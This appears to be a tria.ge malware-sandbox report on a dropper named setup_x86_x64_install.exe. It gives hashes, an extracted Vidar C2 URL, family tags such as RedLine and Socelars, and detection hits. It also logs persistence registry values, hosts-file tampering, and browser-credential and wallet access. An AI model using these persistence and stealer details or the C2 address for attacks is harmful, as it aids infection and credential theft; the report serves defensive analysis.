Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1033s -
max time network
1811s -
platform
windows7_x64 -
resource
win7-fr -
submitted
12/09/2021, 18:18
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
gluptebametasploitraccoonredlinesmokeloadersocelarsvidarxmrig706aspackv2backdoordiscoverydropperinfostealerloaderminerpersistencespywarestealersuricatatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
djvugluptebametasploitraccoonredlinesmokeloadersocelarsxmrigaspackv2backdoordropperinfostealerloaderminerransomwarestealersuricatatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
djvugluptebametasploitsmokeloadersocelarsvidar328706aspackv2backdoordiscoverydropperevasionloaderpersistenceransomwarespywarestealersuricatatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
windows11_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
djvuredlinesmokeloadersocelarsvidar706aspackv2backdoordiscoveryevasioninfostealerpersistenceransomwarespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
redlinesmokeloadersocelarsvidar706aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
gluptebametasploitredlinesmokeloadersocelarsvidar129m4d706utsaspackv2backdoordiscoverydropperinfostealerloaderpersistencespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
gluptebametasploitredlinesmokeloadersocelarsvidar706aspackv2backdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealersuricatatrojan
windows10_x64
0 signatures
0 seconds
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
7279aeead22b91c8176ee932377f2e27
-
SHA1
169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
-
SHA256
8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
-
SHA512
8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697
Malware Config
Extracted
Family
vidar
Version
40.5
Botnet
706
C2
https://gheorghip.tumblr.com/
Attributes
-
profile_id
706
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2932 1756 rundll32.exe 24 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 1756 rundll32.exe 24 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1000 1756 rundll32.exe 24 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral2/memory/2476-305-0x000000000041C5E2-mapping.dmp family_redline -
Socelars Payload 5 IoCs
resource yara_rule behavioral2/files/0x0001000000012f16-164.dat family_socelars behavioral2/files/0x0001000000012f16-165.dat family_socelars behavioral2/files/0x0001000000012f16-155.dat family_socelars behavioral2/files/0x0001000000012f16-144.dat family_socelars behavioral2/files/0x0001000000012f16-117.dat family_socelars -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/1140-181-0x0000000000400000-0x00000000017F4000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x0001000000012f10-69.dat aspack_v212_v242 behavioral2/files/0x0002000000012f0a-72.dat aspack_v212_v242 behavioral2/files/0x0002000000012f0a-71.dat aspack_v212_v242 behavioral2/files/0x0001000000012f10-70.dat aspack_v212_v242 behavioral2/files/0x0001000000012f12-76.dat aspack_v212_v242 behavioral2/files/0x0001000000012f12-75.dat aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
flow pid Process 176 3848 MsiExec.exe 181 3848 MsiExec.exe 184 3848 MsiExec.exe 186 3848 MsiExec.exe 188 3848 MsiExec.exe 190 3848 MsiExec.exe 191 3848 MsiExec.exe 192 3848 MsiExec.exe 193 3848 MsiExec.exe 194 3848 MsiExec.exe 195 3848 MsiExec.exe 196 3848 MsiExec.exe 197 3848 MsiExec.exe 198 3848 MsiExec.exe 199 3848 MsiExec.exe 200 3848 MsiExec.exe 201 3848 MsiExec.exe 202 3848 MsiExec.exe 203 3848 MsiExec.exe 204 3848 MsiExec.exe 205 3848 MsiExec.exe 206 3848 MsiExec.exe 207 3848 MsiExec.exe 208 3848 MsiExec.exe 209 3848 MsiExec.exe 210 3848 MsiExec.exe 211 3848 MsiExec.exe 212 3848 MsiExec.exe 214 3848 MsiExec.exe 215 3848 MsiExec.exe 216 3848 MsiExec.exe 217 3848 MsiExec.exe 218 3848 MsiExec.exe 219 3848 MsiExec.exe 220 3848 MsiExec.exe 221 3848 MsiExec.exe 222 3848 MsiExec.exe 223 3848 MsiExec.exe 224 3848 MsiExec.exe 225 3848 MsiExec.exe 226 3848 MsiExec.exe 227 3848 MsiExec.exe 228 3848 MsiExec.exe 229 3848 MsiExec.exe 230 3848 MsiExec.exe 231 3848 MsiExec.exe 232 3848 MsiExec.exe 233 3848 MsiExec.exe 234 3848 MsiExec.exe 236 3848 MsiExec.exe 238 3848 MsiExec.exe 240 3848 MsiExec.exe 241 3848 MsiExec.exe 242 3848 MsiExec.exe 243 3848 MsiExec.exe 244 3848 MsiExec.exe 245 3848 MsiExec.exe 246 3848 MsiExec.exe 247 3848 MsiExec.exe 248 3848 MsiExec.exe 249 3848 MsiExec.exe 250 3848 MsiExec.exe 251 3848 MsiExec.exe 252 3848 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 64 IoCs
pid Process 2020 setup_installer.exe 1804 setup_install.exe 1876 Sun152260a303c33a7.exe 1140 Sun150d896340a863.exe 668 Sun15d8dfe2c6d17.exe 916 Sun157ff8e4440aa.exe 1656 Sun15223697c98.exe 1864 Sun157a449716c8ee483.exe 1992 Sun15b61bf18b0f1.exe 1952 Sun150faeb3537d.exe 1748 Sun1584240df9fe73a3.exe 964 Sun15b61bf18b0f1.tmp 2156 LzmwAqmV.exe 2168 46807GHF____.exe 2716 Chrome 5.exe 2756 PublicDwlBrowser1100.exe 2784 2.exe 2832 setup.exe 2952 udptest.exe 2976 setup_2.exe 3024 taskkill.exe 3056 setup_2.tmp 1916 jhuuee.exe 2032 8.exe 1160 setup_2.exe 1856 3002.exe 816 BearVpn 3.exe 2328 setup_2.tmp 2080 ultramediaburner.exe 2624 ultramediaburner.tmp 2736 4147520.exe 2480 Rizhelyruxe.exe 632 UltraMediaBurner.exe 2568 614457.exe 2996 Sefejilusi.exe 3036 7911299.exe 2388 6581194.exe 1360 LzmwAqmV.exe 2532 WinHoster.exe 2476 7911299.exe 2420 7952530.exe 2448 inupda.exe 1788 sqtvvs.exe 2696 sqtvvs.exe 788 5023654.exe 2820 FoxyIDM621d.exe 2484 IDM1.tmp 2420 7952530.exe 2152 services64.exe 2428 downloadmanager.exe 2588 sqtvvs.exe 3224 tvps.exe 3420 GcleanerEU.exe 3504 installer.exe 3612 anyname.exe 3796 gcleaner.exe 3980 civdata.exe 3996 civdata.exe 3268 sihost64.exe 3340 AdvancedWindowsManager.exe 3000 AdvancedWindowsManager.exe 2252 AdvancedWindowsManager.exe 2196 AdvancedWindowsManager.exe 2244 AdvancedWindowsManager.exe -
Loads dropped DLL 64 IoCs
pid Process 1992 setup_x86_x64_install.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 1804 setup_install.exe 1804 setup_install.exe 1804 setup_install.exe 1804 setup_install.exe 1804 setup_install.exe 1804 setup_install.exe 1804 setup_install.exe 1804 setup_install.exe 1088 cmd.exe 1196 cmd.exe 1704 cmd.exe 1704 cmd.exe 1040 cmd.exe 432 cmd.exe 432 cmd.exe 1468 cmd.exe 1468 cmd.exe 848 cmd.exe 1412 cmd.exe 1992 Sun15b61bf18b0f1.exe 1992 Sun15b61bf18b0f1.exe 1864 Sun157a449716c8ee483.exe 1864 Sun157a449716c8ee483.exe 1140 Sun150d896340a863.exe 1140 Sun150d896340a863.exe 824 cmd.exe 1952 Sun150faeb3537d.exe 1952 Sun150faeb3537d.exe 1992 Sun15b61bf18b0f1.exe 964 Sun15b61bf18b0f1.tmp 964 Sun15b61bf18b0f1.tmp 964 Sun15b61bf18b0f1.tmp 964 Sun15b61bf18b0f1.tmp 2156 LzmwAqmV.exe 2156 LzmwAqmV.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2156 LzmwAqmV.exe 2156 LzmwAqmV.exe 2156 LzmwAqmV.exe 2156 LzmwAqmV.exe 2648 WerFault.exe 2156 LzmwAqmV.exe 2156 LzmwAqmV.exe 2832 setup.exe 2156 LzmwAqmV.exe 2976 setup_2.exe 2976 setup_2.exe 2952 udptest.exe 2952 udptest.exe 2156 LzmwAqmV.exe 2156 LzmwAqmV.exe 2976 setup_2.exe 2156 LzmwAqmV.exe 3024 taskkill.exe 3024 taskkill.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sqtvvs.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\downloadmanager.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloadmanager.\\downloadmanager.exe" sqtvvs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Jababigogu.exe\"" 46807GHF____.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 614457.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3376 api.ipify.org 7 ip-api.com 53 ip-api.com 2627 api.ipify.org 3199 api.ipify.org 3474 ip-api.com 3486 ip-api.com 3488 icanhazip.com 2985 api.ipify.org 2986 api.ipify.org 3017 api.ipify.org 3405 api.ipify.org -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3036 set thread context of 2476 3036 7911299.exe 101 PID 2420 set thread context of 2448 2420 7952530.exe 111 PID 1788 set thread context of 2696 1788 sqtvvs.exe 113 PID 2588 set thread context of 3116 2588 sqtvvs.exe 137 PID 3980 set thread context of 3996 3980 civdata.exe 162 PID 2152 set thread context of 2748 2152 services64.exe 183 -
Drops file in Program Files directory 18 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-CDAU1.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Internet Explorer\Jababigogu.exe 46807GHF____.exe File created C:\Program Files (x86)\FarLabUninstaller\is-7R8DO.tmp setup_2.tmp File created C:\Program Files (x86)\Internet Explorer\Jababigogu.exe.config 46807GHF____.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files\Windows Journal\CVBNGIGARU\ultramediaburner.exe 46807GHF____.exe File created C:\Program Files\Windows Journal\CVBNGIGARU\ultramediaburner.exe.config 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\is-GFGFH.tmp ultramediaburner.tmp -
Drops file in Windows directory 30 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI5F6E.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI8DE4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2F84.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8CC8.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\f7656e6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI85C7.tmp msiexec.exe File created C:\Windows\Installer\f7656e8.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI7417.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA02B.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI8A3B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA94.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C6F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI474A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB533.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI65D7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8153.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9592.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2372.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9725.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7CA0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8577.tmp msiexec.exe File created C:\Windows\Installer\f7656ea.msi msiexec.exe File created C:\Windows\Installer\f7656e6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI473A.tmp msiexec.exe File opened for modification C:\Windows\Installer\f7656e8.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2648 1140 WerFault.exe 47 2312 2784 WerFault.exe 69 544 3036 WerFault.exe 95 704 2388 WerFault.exe 96 3492 2736 WerFault.exe 87 3180 2420 WerFault.exe 122 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 892 schtasks.exe 1744 schtasks.exe 2640 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 2188 timeout.exe 3272 timeout.exe 3688 timeout.exe 3904 timeout.exe 3912 timeout.exe -
Kills process with taskkill 8 IoCs
pid Process 4020 taskkill.exe 2184 taskkill.exe 3828 taskkill.exe 2516 taskkill.exe 3356 taskkill.exe 2368 taskkill.exe 2628 taskkill.exe 3024 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000008e5bb4ce5210e0b8f551abbe63bf3ad11c3c757c669b4a3665a10a5a23b353bf000000000e8000000002000020000000393fbc19b69def4afc6ef273138628ff25da18e4878015dc27fc711c4732987920000000ff9df221057e5c48665e28cfa0e0db82fcb31b242177303c043d5b9205a1c7424000000098609ea3e2dcf86b2c771bd8f8114674a194cd9ff364d8043c830470389254cfa7e3b48debd4a1e9267424c79891095f9cd3b7b99cdf2175448160d463c604c5 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "28" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9E92D620-13F5-11EC-8D93-46520115B3DE} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80a1de8502a8d701 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "9" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "47" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "122" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\NumberOfSubdomains = "1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "47" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "122" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "863" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "75" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "948" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\fr-FR = "fr-FR.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "47" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca0000000002000000000010660000000100002000000037e20774dc26c25d29e08a5b5376e849224e99ed660b4c4528b92c04931e0b3a000000000e800000000200002000000085712d4d33ef6900570997b4f23e6c462a929a17385ff561932ec0b8f8dc78d290000000a32ae63be178a1c7fe2b7dab0e10ac2c25044270b7d0ead3a1c832f4e141be74d1044a06558e9900c8c465f58c42836dfe83c70802a5732c33d04cfaa7dd8b58613ecbd3fb7ea6854603965a1b95cab41947356dedf77f4962730a085345888f00a6fda33792f2830c8e25e216d6915a8be0e10cd7cd9dfa132378af09dd761f7781c086577476063a493150f3169f6b4000000050c8d008923db0070989dc5051ffcf49a359172d2a9a1beda2f43699e1b68966c00d042425fd6064b443d2ac2c32166751ee5945d251a2cf82cd3d855c9b8a7f 